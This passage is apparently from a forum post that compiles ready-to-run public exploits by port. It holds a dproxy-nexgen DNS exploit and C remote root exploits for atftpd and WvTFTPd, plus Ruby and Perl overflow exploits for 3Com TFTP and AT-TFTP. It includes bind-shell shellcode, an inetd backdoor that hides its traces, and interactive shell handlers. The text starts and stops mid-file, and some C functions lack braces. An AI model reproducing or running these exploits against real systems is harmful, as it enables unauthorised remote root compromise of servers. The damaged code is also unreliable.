"\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x 49\x79\xf9\xb0"
"\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x 89\xe3\x52\x53"
"\x89\xe1\xcd\x80";
#define NUM_TARGETS 2
struct target_t
{
const u_char *name;
const int len;
const int zshell_pos;
const u_char *zshell;
const int fp_pos;
const u_long fp;
};
/* fp = objdump -D dproxy | grep "ff e2" */
struct target_t targets[] = {
{"dproxy-nexgen (tar.gz)",
512, 25, bndshell_lnx, 284, 0x08048cf9}
,
{"dproxy-nexgen (tar.gz, Debian stable)",
512, 25, bndshell_lnx, 281, 0x08048cf8}
,
{0}
};
static int sock_send (int sock, u_char * src, int len);
static int sock_recv (int sock, u_char * dst, int len);
static void sock_send_udp (u_char * host, int port, u_char * src, int len);
static int sockami (u_char * host, int port);
static void shellami (int sock);
static void zbuffami (u_char * zbuf, struct target_t *trgt);
static int
sock_send (int sock, u_char * src, int len)
{
int sbytes;
sbytes = send (sock, src, len, 0);
return (sbytes);
}
static int
sock_recv (int sock, u_char * dst, int len)
{
int rbytes;
rbytes = recv (sock, dst, len, 0);
if (rbytes >= 0)
dst[rbytes] = '\0';
return (rbytes);
}
static void
sock_send_udp (u_char * host, int port, u_char * src, int len)
{
struct sockaddr_in address;
struct hostent *hp;
int sock;
fflush (stdout);
if ((sock = socket (AF_INET, SOCK_DGRAM, 0)) == -1)
{
perror ("socket()");
exit (-1);
}
if ((hp = gethostbyname (host)) == NULL)
{
perror ("gethostbyname()");
exit (-1);
}
memset (&address, 0, sizeof (address));
memcpy ((char *) &address.sin_addr, hp->h_addr, hp->h_length);
address.sin_family = AF_INET;
address.sin_port = htons (port);
sendto (sock, src, len, 0, (struct sockaddr *) &address, sizeof (address));
}
static int
sockami (u_char * host, int port)
{
struct sockaddr_in address;
struct hostent *hp;
int sock;
fflush (stdout);
if ((sock = socket (AF_INET, SOCK_STREAM, 0)) == -1)
{
perror ("socket()");
exit (-1);
}
if ((hp = gethostbyname (host)) == NULL)
{
perror ("gethostbyname()");
exit (-1);
}
memset (&address, 0, sizeof (address));
memcpy ((char *) &address.sin_addr, hp->h_addr, hp->h_length);
address.sin_family = AF_INET;
address.sin_port = htons (port);
if (connect (sock, (struct sockaddr *) &address, sizeof (address)) == -1)
{
perror ("connect()");
exit (EXIT_FAILURE);
}
return (sock);
}
static void
shellami (int sock)
{
int n;
fd_set rset;
u_char recvbuf[1024], *cmd = "id; uname -a; uptime\n";
sock_send (sock, cmd, strlen (cmd));
while (1)
{
FD_ZERO (&rset);
FD_SET (sock, &rset);
FD_SET (STDIN_FILENO, &rset);
select (sock + 1, &rset, NULL, NULL, NULL);
if (FD_ISSET (sock, &rset))
{
if ((n = sock_recv (sock, recvbuf, sizeof (recvbuf) - 1)) <= 0)
{
fprintf (stderr, "Connection closed by foreign host.\n");
exit (EXIT_SUCCESS);
}
printf ("%s", recvbuf);
}
if (FD_ISSET (STDIN_FILENO, &rset))
{
if ((n = read (STDIN_FILENO, recvbuf, sizeof (recvbuf) - 1)) > 0)
{
recvbuf[n] = '\0';
sock_send (sock, recvbuf, n);
}
}
}
}
static void
zbuffami (u_char * zbuf, struct target_t *trgt)
{
int i;
u_char *ptr;
ptr = zbuf;
memset (ptr, NOP, trgt->len);
*ptr++ = 0x69; /* transaction id */
*ptr++ = 0x69;
*ptr++ = 0x81; /* flags */
*ptr++ = 0x80;
*ptr++ = 0x00; /* number of questions */
*ptr++ = 0x00;
*ptr++ = 0x00; /* number of answers */
*ptr++ = 0x01;
*ptr++ = 0x00; /* number of authority rr's */
*ptr++ = 0x00;
*ptr++ = 0x00; /* number of additional rr's */
*ptr++ = 0x00;
*ptr++ = 0xc0; /* compressed name &ptr+18 */
*ptr++ = 0x18;
*ptr++ = 0x00; /* type = PTR */
*ptr++ = 0x0c;
*ptr++ = 0x07; /* class = jmp short +0x07 */
*ptr++ = 0xeb;
*ptr++ = 0xff; /* ttl */
*ptr++ = 0xff;
*ptr++ = 0xff;
*ptr++ = 0xff;
*ptr++ = 0x01; /* data length = 488 bytes */
*ptr++ = 0xe8;
/* wire format name */
for (i = 0; i < 2; i++, ptr += 0x7f) {
*ptr++ = 0x7f;
memset (ptr, NOP, 0x7f);
}
*ptr++ = 0x02; /* padding */
*ptr++ = NOP;
*ptr++ = NOP;
*ptr++ = 0x00; /* terminate name */
/* terminate buffer */
ptr = zbuf + trgt->len - 1;
*ptr-- = 0x2e;
*ptr = 0x2e;
memcpy (zbuf + trgt->zshell_pos, trgt->zshell, strlen (trgt->zshell));
zbuf[trgt->fp_pos] = (u_char) (trgt->fp & 0x000000ff);
zbuf[trgt->fp_pos + 1] = (u_char) ((trgt->fp & 0x0000ff00) >> 8);
zbuf[trgt->fp_pos + 2] = (u_char) ((trgt->fp & 0x00ff0000) >> 16);
zbuf[trgt->fp_pos + 3] = (u_char) ((trgt->fp & 0xff000000) >> 24);
}
int
main (int argc, char **argv)
{
int sock;
u_char zbuf[BUF_SIZE];
struct target_t *trgt;
printf ("dproxy-nexgen remote root exploit\n"
"by: <[email protected]>\n"
"http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n");
if (argc <= 2)
{
fprintf (stderr, "Usage: %s <host> <target>\n", argv[0]);
exit (EXIT_SUCCESS);
}
if (atoi (argv[2]) >= NUM_TARGETS)
{
fprintf (stderr, "Only %d targets known!!\n", NUM_TARGETS);
exit (EXIT_SUCCESS);
}
trgt = &targets[atoi (argv[2])];
printf ("+Attacking to %s...\n", argv[1]);
printf ("fp: 0x%x\n", (int) trgt->fp);
printf ("buf len: %d\n", trgt->len);
printf ("+Building buffer with shellcode...");
memset (zbuf, 0x00, sizeof (zbuf));
zbuffami (zbuf, trgt);
printf (" done\n");
printf ("+Sending Payload...");
sock_send_udp (argv[1], PORT_DNS, zbuf, BUF_SIZE);
printf (" done\n");
printf ("+Waiting for the shellcode to be executed...\n");
sleep (1);
sock = sockami (argv[1], PORT_SHELL);
printf ("+Wh00t!\n\n");
shellami (sock);
return (EXIT_SUCCESS);
}
// [2007-03-30]
#################################
انتهينا من بورت 53
################################
نبداء بـ بورت 69
69 Atftpd 0.6 Remote Root Exploit (atftpdx.c)
/**
** PoC linux/86 remote exploit against atftpd (c) gunzip ( FIXED )
**
**
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <signal.h>
#define HEAP_START 0x080514b4
#define HEAP_END 0x080594b4
#define BACKDOOR "rfe" /* port MUST be > 1024 */
#define NOPNUM 128 /* number of nops */
#define PORT 69 /* tftpd port */
#define BUFSIZE 512 /* size of exploit buffer */
#define TIMEOUT 0x5 /* timeout in sec. */
#define NOALARM 0x0 /* no timeout */
#define RRQ 0x1 /* request method */
#define MODE "octet" /* request mode */
#define OFFSET 16000 /* distance of nops from heap */
struct target {
char * name ;
unsigned int align ;
unsigned int len ;
unsigned int retaddr ;
} tg[] =
{
{ "Linux (Debian 3.0)", 0, 264, 0x0805560c },
{ NULL, 0, 0, 0 }
};
char shellcode[]= /* taken from lsd-pl.net */
"\xeb\x22" /* jmp <cmdshellcode+36> */
"\x59" /* popl %ecx */
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68""//sh" /* pushl $0x68732f2f */
"\x68""/bin" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x66\x68""-c" /* pushw $0x632d */
"\x89\xe7" /* movl %esp,%edi */
"\x50" /* pushl %eax */
"\x51" /* pushl %ecx */
"\x57" /* pushl %edi */
"\x53" /* pushl %ebx */
"\x89\xe1" /* movl %esp,%ecx */
"\x99" /* cdql */
"\xb0\x0b" /* movb $0x0b,%al */
"\xcd\x80" /* int $0x80 */
"\xe8\xd9\xff\xff\xff" /* call <cmdshellcode+2> */
"echo " BACKDOOR " stream tcp nowait nobody /bin/sh sh -i>/tmp/.x ;/usr/sbin/inetd /tmp/.x;"
;
void timeout( int sig )
{
alarm( NOALARM );
signal( SIGALRM, SIG_DFL );
fprintf(stderr,"[-] Timeout.\n");
exit( EXIT_FAILURE );
}
int shell( int fd )
{
int rd ;
fd_set rfds;
static char buff[ 1024 ];
char INIT_CMD[] = "unset HISTFILE; rm -f /tmp/.x; echo; id; uname -a\n";
write(fd, INIT_CMD, strlen( INIT_CMD ));
while(1) {
FD_ZERO( &rfds );
FD_SET(0, &rfds);
FD_SET(fd, &rfds);
if(select(fd+1, &rfds, NULL, NULL, NULL) < 1) {
perror("[-] Select");
exit( EXIT_FAILURE );
}
if( FD_ISSET(0, &rfds) ) {
if( (rd = read(0, buff, sizeof(buff))) < 1) {
perror("[-] Read");
exit( EXIT_FAILURE );
}
if( write(fd,buff,rd) != rd) {
perror("[-] Write");
exit( EXIT_FAILURE );
}
}
if( FD_ISSET(fd, &rfds) ) {
if( (rd = read(fd, buff, sizeof(buff))) < 1) {
exit( EXIT_SUCCESS );
}
write(1, buff, rd);
}
}
}
int try( unsigned short bport, unsigned long ip )
{
int sockfd ;
struct sockaddr_in sheep ;
if ((sockfd = socket (AF_INET, SOCK_STREAM, 0)) == -1)
{
perror("[-] Socket");
exit( EXIT_FAILURE );
}
sheep.sin_family = AF_INET;
sheep.sin_addr.s_addr = ip ;
sheep.sin_port = htons ( bport );
signal( SIGALRM, timeout );
alarm( TIMEOUT );
if ( connect(sockfd,(struct sockaddr *)&sheep,sizeof(sheep)) == -1 )
{
alarm( NOALARM );
signal(SIGALRM,SIG_DFL);
return 0;
}
alarm( NOALARM );
signal(SIGALRM,SIG_DFL);
return sockfd ;
}
char * xp_make_str( unsigned int len, unsigned int align, unsigned long retaddr )
{
int c ;
char * xp = (char *)calloc( BUFSIZE, sizeof(char) );
char * code = shellcode ;
if( !xp ) {
fprintf(stderr, "[-] Not enough memory !\n");
exit( EXIT_FAILURE );
}
/* stupid check */
if (( align + len ) > (BUFSIZE - strlen( shellcode ) - 32)) {
fprintf(stderr, "[-] String too long or align too high.\n");
exit( EXIT_FAILURE );
}
/*
* our buffer shoud look like this
*
* [ NOPS ][ SHELLCODE ][ RETADDR * 4 ][ 0 ][ MODE ][ 0 ][ NOPS ][ SHELLCODE ]
* |_____> len
*/
memset ( xp, 0x41, BUFSIZE );
memcpy( xp + len - strlen( code ) - 16, code, strlen( code ));
for ( c = align + len - 16 ; c < len ; c += 4 )
*(long *)( xp + c ) = retaddr ;
*( xp ) = 0x0 ;
*( xp + 1 ) = RRQ ;
*( xp + len )= '\0' ;
memcpy( xp + len + 1, MODE, strlen( MODE ));
*( xp + len + 1 + strlen( MODE )) = '\0' ;
memcpy ( xp + BUFSIZE - strlen( code ), code, strlen( code ));
return xp ;
}
void usage( char * a )
{
int o = 0 ;
fprintf(stderr,
"__Usage: %s -h host -t target [options]\n\n"
"-o\toffset\n"
"-a\talign\n"
"-s\tstep for bruteforcing (try 120 <= step <= 512)\n"
"-l\tlength of filename\n"
"-v\ttreceives packets too (check if daemon's crashed)\n"
"-b\tenables bruteforce (dangerous !)\n\n", a);
while( tg[o].name != NULL )
{
fprintf(stderr, "\t%d - %s\n", o, tg[o].name ); o++ ;
}
fprintf( stderr, "\n" );
exit( EXIT_FAILURE );
}
int main(int argc, char *argv[])
{
int sfd, t = 0, bport = 0, opt = 0, offset = 0,
want_receive = 0, brute = 0, yeah = 0, step = 0;
struct servent * se ;
unsigned long n ;
char * host ;
struct sockaddr_in server ;
int len = sizeof(server);
char * rbuf = (char *)calloc( BUFSIZE + 4, sizeof(char) );
char * wbuf = (char *)calloc( BUFSIZE + 4, sizeof(char) );
if ( !wbuf || !rbuf ) {
fprintf(stderr, "[-] Not enough memory !\n");
exit( EXIT_FAILURE );
}
memset(&server, 0, sizeof(server));
fprintf(stderr,"\nlinux/x86 atftpd remote exploit by gunzip\n\n");
if ( argc < 3 )
usage( argv[0] );
while ((opt = getopt(argc, argv, "bvo:a:l:h:t:s:")) != EOF) {
switch(opt)
{
case 's': step = atoi( optarg ); break ;
case 'h': host = strdup ( optarg ); break;
case 't': t = atoi(optarg); break;
case 'b': brute++ ; break ;
case 'v': want_receive++ ; break ;
case 'o': offset += atoi( optarg ); break;
case 'a': tg[t].align = atoi( optarg ); break;
case 'l': tg[t].len = atoi( optarg ); break;
default: usage( argv[0] ); break;
}
}
if (( se = getservbyname( BACKDOOR, NULL )) == NULL ) {
perror("[-] Getservbyname");
exit( EXIT_FAILURE );
}
if ((bport = ntohs( se->s_port )) < 1024 ) {
fprintf(stderr, "[-] Backdoor port must be <= 1024\n");
exit( EXIT_FAILURE );
}
if ( inet_aton( host , &server.sin_addr) == 0 ) {
struct hostent * he ;
if ( (he = gethostbyname( host )) == NULL ) {
perror("[-] Gethostbyname");
exit( EXIT_FAILURE );
}
server.sin_addr.s_addr =
((struct in_addr *)(he->h_addr))->s_addr ;
}
if ((sfd = socket(AF_INET, SOCK_DGRAM, 0)) == -1 ) {
perror("[-] Socket");
exit( EXIT_FAILURE );
}
fprintf(stdout,"[+] Sending request to host %s\n",
inet_ntoa(server.sin_addr));
if ( !step ) step = tg[t].len / 2 ;
if ( brute ) offset += OFFSET ;
for( n = HEAP_START + offset; n < HEAP_END ; n += step ) {
fprintf(stdout,"[+] Using len=%d align=%d retaddr=0x%.8x shellcode=%d bport=%d\n",
tg[t].len, tg[t].align,
(brute ) ? (unsigned int)n : (unsigned int)tg[t].retaddr + offset,
strlen(shellcode), bport );
if ( !brute )
wbuf = xp_make_str( tg[t].len, tg[t].align, tg[t].retaddr + offset );
else
wbuf = xp_make_str( tg[t].len, tg[t].align, n );
server.sin_port = htons( PORT );
if ( sendto(sfd, wbuf,
(size_t) BUFSIZE, 0,
(struct sockaddr *)&server,
(socklen_t)sizeof(struct sockaddr)) < tg[t].len)
{
perror("[-] Sendto");
}
else if ( want_receive )
{
signal( SIGALRM, timeout );
alarm( TIMEOUT );
if ( recvfrom(sfd, rbuf,
(size_t) BUFSIZE, 0,
(struct sockaddr *)&server,
(socklen_t *)&len) != -1 )
{
alarm( NOALARM );
signal( SIGALRM, SIG_DFL);
fprintf( stdout,"[+] Received: %.2x %.2x %.2x %.2x\n",
rbuf[0],rbuf[1],rbuf[2],rbuf[3]);
}
else {
perror("[-] Recvfrom");
}
}
sleep ( 1 ) ;
if((yeah = try( bport, server.sin_addr.s_addr ))) {
shell( yeah );
exit( EXIT_SUCCESS );
}
if ( !brute ) break ;
memset( wbuf, 0, BUFSIZE + 4 );
memset( rbuf, 0, BUFSIZE + 4 );
}
return 1 ;
}
// [2003-06-10]
69 WvTFTPd 0.9 Remote Root Heap Overflow Exploit
/*
* wvtftp option name heap overflow remote root exploit
*
* infamous42md AT hotpop DOT com
*
* exploitation is not exactly straight forward. When we overflow our buffer,
* we overwrite a pointer that is freed before we get to trigger our overwrite.
* so we have to restore the state of this pointer to some sane value so it can
* be freed. after we do this, we trigger the overwrite, and hijack the
* jumpslot for malloc(). then to trigger malloc(), we send a bogus request,
* and then connect to our shell. all of the offsets should be fixed for 32 bit
* platforms, all you need to pass is the base address of the heap buffer we're
* overflowing. 'ltrace wvtftpd -dd 2>&1 | grep malloc | grep 616', and of
* course the jumpslot for malloc(), 'objdump -R wvtftpd | grep malloc'.
*
*/
#if 0
Usage: ./a.out
[ -h host ] [ -r object_heap_base ] [ -l retloc ]
[ -f remote file ] < -p port > < -a align >
[[email protected]] ./a.out -h localho -r 0x8063cd0 -l 0x0805e540
connected to localho(127.0.0.1)
exploit sent, total data len 597
triggering overwritten jumpslot
connected to localho(127.0.0.1)
got a shell
id
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(di sk),10(wheel),11(floppy)
- Connection closed by user
#endif
#include <stdio.h>
#include <sys/types.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <stdlib.h>
#define REMOTE_FILE "foo"
#define FTP_PORT 69
#define NOP 0x90
#define BS 0x1000
#define SHELL_PORT 7000
#define ALIGN 0
#define die(x) do{ perror(x); exit(1); }while(0)
/* a dlmalloc chunk descriptor */
#define CHUNKSZ sizeof(mchunk_t)
typedef struct _mchunk {
size_t prevsz;
size_t sz;
long fd;
long bk;
} mchunk_t;
/* program arguments */
typedef struct _args {
char *host,
*remote_file;
u_long object_heap_base,
retloc;
u_short port,
align;
} args;
/* call them shell code */
#define SHELL_LEN (sizeof(remote)-1)
char remote[] =
"\xeb\x0a""1234567890" /* jump */
"\x31\xc0\x50\x50\x66\xc7\x44\x24\x02\x1b\x58\xc6\x 04\x24\x02\x89\xe6"
"\xb0\x02\xcd\x80\x85\xc0\x74\x08\x31\xc0\x31\xdb\x b0\x01\xcd\x80\x50"
"\x6a\x01\x6a\x02\x89\xe1\x31\xdb\xb0\x66\xb3\x01\x cd\x80\x89\xc5\x6a"
"\x10\x56\x50\x89\xe1\xb0\x66\xb3\x02\xcd\x80\x6a\x 01\x55\x89\xe1\x31"
"\xc0\x31\xdb\xb0\x66\xb3\x04\xcd\x80\x31\xc0\x50\x 50\x55\x89\xe1\xb0"
"\x66\xb3\x05\xcd\x80\x89\xc5\x31\xc0\x89\xeb\x31\x c9\xb0\x3f\xcd\x80"
"\x41\x80\xf9\x03\x7c\xf6\x31\xc0\x50\x68\x2f\x2f\x 73\x68\x68\x2f\x62"
"\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x 80\xa1\x5f\x66\x6e\x69";
void usage(char *progname)
fprintf(stderr, "Usage: %s\n"
"\t[ -h host ] [ -r object_heap_base ] [ -l retloc ]\n"
"\t[ -f remote file ] < -p port > < -a align >\n",
progname);
exit(EXIT_FAILURE);
void parse_args(int argc, char **argv, args *argp)
int c = 0;
while((c = getopt(argc, argv, "h:p:r:a:l:")) != -1) {
switch (c) {
case 'a':
argp->align = atoi(optarg);
break;
case 'p':
argp->port = atoi(optarg);
break;
case 'r':
argp->object_heap_base = strtoul(optarg, NULL, 16);
break;
case 'l':
argp->retloc = strtoul(optarg, NULL, 16);
break;
case 'h':
argp->host = optarg;
break;
case 'f':
argp->remote_file = optarg;
break;
case ':':
case '?':
default:
usage(argv[0]);
}
}
if(optind != argc || argp->align > CHUNKSZ-1 || argp->object_heap_base == 0
||
argp->host == NULL || argp->port == 0 || argp->retloc == 0 ||
argp->remote_file == NULL)
usage(argv[0]);
int conn(char *host, u_short port, int proto)
int sock = 0;
struct hostent *hp;
struct sockaddr_in sa;
memset(&sa, 0, sizeof(sa));
hp = gethostbyname(host);
if (hp == NULL) {
herror("gethostbyname");
exit(EXIT_FAILURE);
}
sa.sin_family = AF_INET;
sa.sin_port = htons(port);
sa.sin_addr = **((struct in_addr **) hp->h_addr_list);
sock = socket(AF_INET, proto, 0);
if (sock < 0)
die("socket");
/* with UDP this means we can write() instead of sendto() */
if (connect(sock, (struct sockaddr *) &sa, sizeof(sa)) < 0)
die("connect");
printf("\nconnected to %s(%s)\n\n", host, inet_ntoa(sa.sin_addr));
return sock;
/*
* ftp packet bytes look like:
*
* 0-1 code - [0]*256 + [1] : 1 for read, 2 for write
* 2 NULL termed file name, must exist and be readable
* X NULL termed mode [ netascii octet mail ]
* Y NULL termed option name
* Z NULL termed option value : overflow with this string
* and a bad option to get our pointer freed
*/
void sploit(args *argp, int sock)
int len = 0, align = argp->align, x = 0, begin_packet_data;
long retloc = argp->retloc, object_heap_base = argp->object_heap_base;
char buf[BS], *remote_file = argp->remote_file;
mchunk_t chunk;
memset(buf, 0, BS);
memset(&chunk, 0, CHUNKSZ);
/* set opcode for reading */
buf[1] = 1;
len = 2;
/* the file to read, and the mode */
len += sprintf(buf + len, "%s", remote_file) + 1;
len += sprintf(buf + len, "%s", "octet") + 1;
/* all that follows gets copied via strcpy() */
begin_packet_data = len;
/* the option */
len += sprintf(buf+len, "%s", "blksize") + 1; /* 8 */
/* the overflow , but first a valid blocksize to past test */
len += sprintf(buf+len, "%s", "512"); /* 3 */
/*
* from here buffer looks like:
* [ align - shell - chunks - pkttimes - chunks ]
*/
#define OFFSET_TO_OUR_BUF_FROM_BASE 56
/* setup the chunk */
chunk.prevsz = 0xfffffffc;
chunk.sz = 0xfffffffc;
chunk.fd = retloc - 12;
chunk.bk = object_heap_base + OFFSET_TO_OUR_BUF_FROM_BASE + align + 11/* 8 +
3 */;
memset(buf+len, 'A', align);
len += align;
memcpy(buf+len, remote, SHELL_LEN);
len += SHELL_LEN;
#define CHUNK_BYTES 416
for(x = 0; x < CHUNK_BYTES - (CHUNKSZ - 1); x+= CHUNKSZ)
memcpy(buf+len+x, &chunk, CHUNKSZ);
len += x;
buf[len++] = 0;
/* trigger the free with a bad option (no value) */
len += sprintf(buf+len, "%s", "blksize") + 1;
/*
* the buffer we overflow is part of a larger structure that is embedded in
* a class object located on the heap. the base address of this object is
* what 'object_heap_base' refers to. the structure is 'struct TFTPConn',
* member of the 'class WvTFTPBase'. we need to repair a pointer in the
* data that we overwrite. the pkttimes member of the structure is a
* pointer to an object of type 'class PktTime' that gets deleted. in this
* destructor for the object that gets deleted, a member pointer offset 12
* bytes in, is a pointer that gets freed via delete. This freed pointer
* needs to be set up by us. You could create a fake chunk and use that,
* but it is simpler to just make that pointer be NULL as free(0) does
* nothing. there are several spots where we have a guaranteed NULL word
* inside of the 'struct TFTPConn' class object. so the idea is to point
* pkttimes 12 bytes below that NULL, so that when it goes to free the
* pointer, it will use the NULL word.
*/
/*
* our buffer is 512 bytes, and we start copying at 2 bytes in. the
* distance to pkttimes pointer is 526 bytes, rounded up to 4 byte boundary
*/
#define OFFSET_TO_PKTTIMES_IN_BUFFER 528
/*
* we point pkttimes at an area that contains guaranteed NULL word, which is
* the 'lastsent' member of the TFTPConn structure. it is the number of
* blocks which have been sent over teh connection so far. it will always
* be 0 since no blocks have been sent to us yet. if we know the base of
* the object we know where 'lastsent' is located.
*/
#define OFFSET_TO_NULL_POINTERS_FROM_BASE_MINUS_12 40
*(uint32_t *)(buf + begin_packet_data + OFFSET_TO_PKTTIMES_IN_BUFFER) =
object_heap_base + OFFSET_TO_NULL_POINTERS_FROM_BASE_MINUS_12;
write(sock, buf, len);
printf("exploit sent, total data len %d\n\n", len);
void shell(char *host, u_short port)
int sock = 0, l = 0;
char buf[BS];
fd_set rfds;
sock = conn(host, port, SOCK_STREAM);
printf("got a shell\n\n");
FD_ZERO(&rfds);
while(1){
FD_SET(STDIN_FILENO, &rfds);
FD_SET(sock, &rfds);
if(select(sock + 1, &rfds, NULL, NULL, NULL) < 1)
die("select");
if(FD_ISSET(STDIN_FILENO, &rfds)) {
if((l = read(0, buf, BS)) <= 0)
die("\n - Connection closed by user\n");
if(write(sock, buf, l) < 1)
die("write");
}
if(FD_ISSET(sock, &rfds)) {
l = read(sock, buf, sizeof(buf));
if (l == 0)
die("\n - Connection terminated.\n");
else if(l < 0)
die("\n - Read failure\n");
if(write(1, buf, l) < 1)
die("write");
}
}
/*
* call the function whose jumpslot we overwrote, malloc()
*/
void trigger_retloc(int sock)
char buf[BS];
write(sock, buf, 200);
/*
*/
int main(int argc, char **argv)
int sock = 0;
args argy;
memset(&argy, 0, sizeof(argy));
argy.align = ALIGN;
argy.port = FTP_PORT;
argy.remote_file = REMOTE_FILE;
parse_args(argc, argv, &argy);
sock = conn(argy.host, argy.port, SOCK_DGRAM);
sploit(&argy, sock);
sleep(2);
printf("triggering overwritten jumpslot\n\n");
trigger_retloc(sock);
sleep(1);
close(sock);
shell(argy.host, SHELL_PORT);
return EXIT_SUCCESS;
// [2004-10-28]
69 3Com TFTP Service <= 2.0.1 (Long Transporting Mode) Overflow Exploit
# 3comtftpd_xpsp2.rb
#
# Copyright (C) cthulhu
#
#
# This is a poc intended to exploit the 3Com TFTP Service version 2.0.1
# long transporting mode buffer overflow under xp sp2 english
# (Vulnerability discovered by Liu Qixu)
#
# Usage :
# ruby 3comftpd_xpsp2.rb <victimhost> <victimport>
# Default port is 69 if not specified
require 'socket'
# win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
sc1 = "\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x 81\x73\x13\x02"
sc1 += "\xaf\xbb\x16\x83\xeb\xfc\xe2\xf4\xfe\xc5\x50\x5b\x ea\x56\x44\xe9"
sc1 +="\xfd\xcf\x30\x7a\x26\x8b\x30\x53\x3e\x24\xc7\x13\x 7a\xae\x54\x9d"
sc1 +="\x4d\xb7\x30\x49\x22\xae\x50\x5f\x89\x9b\x30\x17\x ec\x9e\x7b\x8f"
sc1 +="\xae\x2b\x7b\x62\x05\x6e\x71\x1b\x03\x6d\x50\xe2\x 39\xfb\x9f\x3e"
sc1 +="\x77\x4a\x30\x49\x26\xae\x50\x70\x89\xa3\xf0\x9d\x 5d\xb3\xba\xfd"
sc1 +="\x01\x83\x30\x9f\x6e\x8b\xa7\x77\xc1\x9e\x60\x72\x 89\xec\x8b\x9d"
sc1 +="\x42\xa3\x30\x66\x1e\x02\x30\x56\x0a\xf1\xd3\x98\x 4c\xa1\x57\x46"
sc1 +="\xfd\x79\xdd\x45\x64\xc7\x88\x24\x6a\xd8\xc8\x24\x 5d\xfb\x44\xc6"
sc1 +="\x6a\x64\x56\xea\x39\xff\x44\xc0\x5d\x26\x5e\x70\x 83\x42\xb3\x14"
sc1 +="\x57\xc5\xb9\xe9\xd2\xc7\x62\x1f\xf7\x02\xec\xe9\x d4\xfc\xe8\x45"
sc1 +="\x51\xfc\xf8\x45\x41\xfc\x44\xc6\x64\xc7\xaa\x4a\x 64\xfc\x32\xf7"
sc1 +="\x97\xc7\x1f\x0c\x72\x68\xec\xe9\xd4\xc5\xab\x47\x 57\x50\x6b\x7e"
sc1 +="\xa6\x02\x95\xff\x55\x50\x6d\x45\x57\x50\x6b\x7e\x e7\xe6\x3d\x5f"
sc1 +="\x55\x50\x6d\x46\x56\xfb\xee\xe9\xd2\x3c\xd3\xf1\x 7b\x69\xc2\x41"
sc1 +="\xfd\x79\xee\xe9\xd2\xc9\xd1\x72\x64\xc7\xd8\x7b\x 8b\x4a\xd1\x46"
sc1 +="\x5b\x86\x77\x9f\xe5\xc5\xff\x9f\xe0\x9e\x7b\xe5\x a8\x51\xf9\x3b"
sc1 +="\xfc\xed\x97\x85\x8f\xd5\x83\xbd\xa9\x04\xd3\x64\x fc\x1c\xad\xe9"
sc1 +="\x77\xeb\x44\xc0\x59\xf8\xe9\x47\x53\xfe\xd1\x17\x 53\xfe\xee\x47"
sc1 +="\xfd\x7f\xd3\xbb\xdb\xaa\x75\x45\xfd\x79\xd1\xe9\x fd\x98\x44\xc6"
sc1 +="\x89\xf8\x47\x95\xc6\xcb\x44\xc0\x50\x50\x6b\x7e\x f2\x25\xbf\x49"
sc1 +="\x51\x50\x6d\xe9\xd2\xaf\xbb\x16"
jmp = "\x63\x20\xdc\x77" # jmp esi user32.dll xp sp 2 english
host = ARGV[0]
port = 69
if ARGV[1]
port = ARGV[1]
end
sock = UDPSocket.new()
puts "[+]Trying to connect to #{host}"
if (not sock.connect(host,port))
raise "Unable to connect to #{host}"
end
exploit = "\x00\x02"
exploit += "a"
exploit += "\x00"
exploit += "\x90"* 129
exploit += sc1
exploit += jmp
exploit += "\x00"
puts "[+] Connected ... Sending exploit to victim"
sock.send exploit,0
puts "[+] Exploit sended.. Now telnet on port 4444 for your shell"
# [2006-11-30]
69 AT-TFTP <= 1.9 (Long Filename) Remote Buffer Overflow Exploit
#!/usr/bin/perl -w
#acaro[at]jervus.it
#http://www.securityfocus.com/bid/21320
#
# [email protected] is credited with the discovery of this vulnerability
use IO::Socket;
if(!($ARGV[1]))
{
print "Uso: atftp-19.pl <victim> <port>\n\n";
exit;
}
$victim = IO::Socket::INET->new(Proto=>'udp',
PeerAddr=>$ARGV[0],
PeerPort=>$ARGV[1])
or die "Cannot connect to $ARGV[0] sulla porta $ARGV[1]";
$pad = "\x90"x63;
# win32_exec - EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com
$shellcode = "\x33\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x 81\x73\x13\xf1".
"\xf1\x59\x06\x83\xeb\xfc\xe2\xf4\x0d\x19\x1d\x06\x f1\xf1\xd2\x43".
"\xcd\x7a\x25\x03\x89\xf0\xb6\x8d\xbe\xe9\xd2\x59\x d1\xf0\xb2\x4f".
"\x7a\xc5\xd2\x07\x1f\xc0\x99\x9f\x5d\x75\x99\x72\x f6\x30\x93\x0b".
"\xf0\x33\xb2\xf2\xca\xa5\x7d\x02\x84\x14\xd2\x59\x d5\xf0\xb2\x60".
"\x7a\xfd\x12\x8d\xae\xed\x58\xed\x7a\xed\xd2\x07\x 1a\x78\x05\x22".
"\xf5\x32\x68\xc6\x95\x7a\x19\x36\x74\x31\x21\x0a\x 7a\xb1\x55\x8d".
"\x81\xed\xf4\x8d\x99\xf9\xb2\x0f\x7a\x71\xe9\x06\x f1\xf1\xd2\x6e".
"\xcd\xae\x68\xf0\x91\xa7\xd0\xfe\x72\x31\x22\x56\x 99\x01\xd3\x02".
"\xae\x99\xc1\xf8\x7b\xff\x0e\xf9\x16\x92\x38\x6a\x 92\xdf\x3c\x7e".
"\x94\xf1\x59\x06";
#$eip="\x42\x42\x42\x42";
$eip="\xf4\xf5\xe3\x75"; #call [ESP+28] in IMM32.dll on win2k Server SP4 Italian
$mode = "netascii";
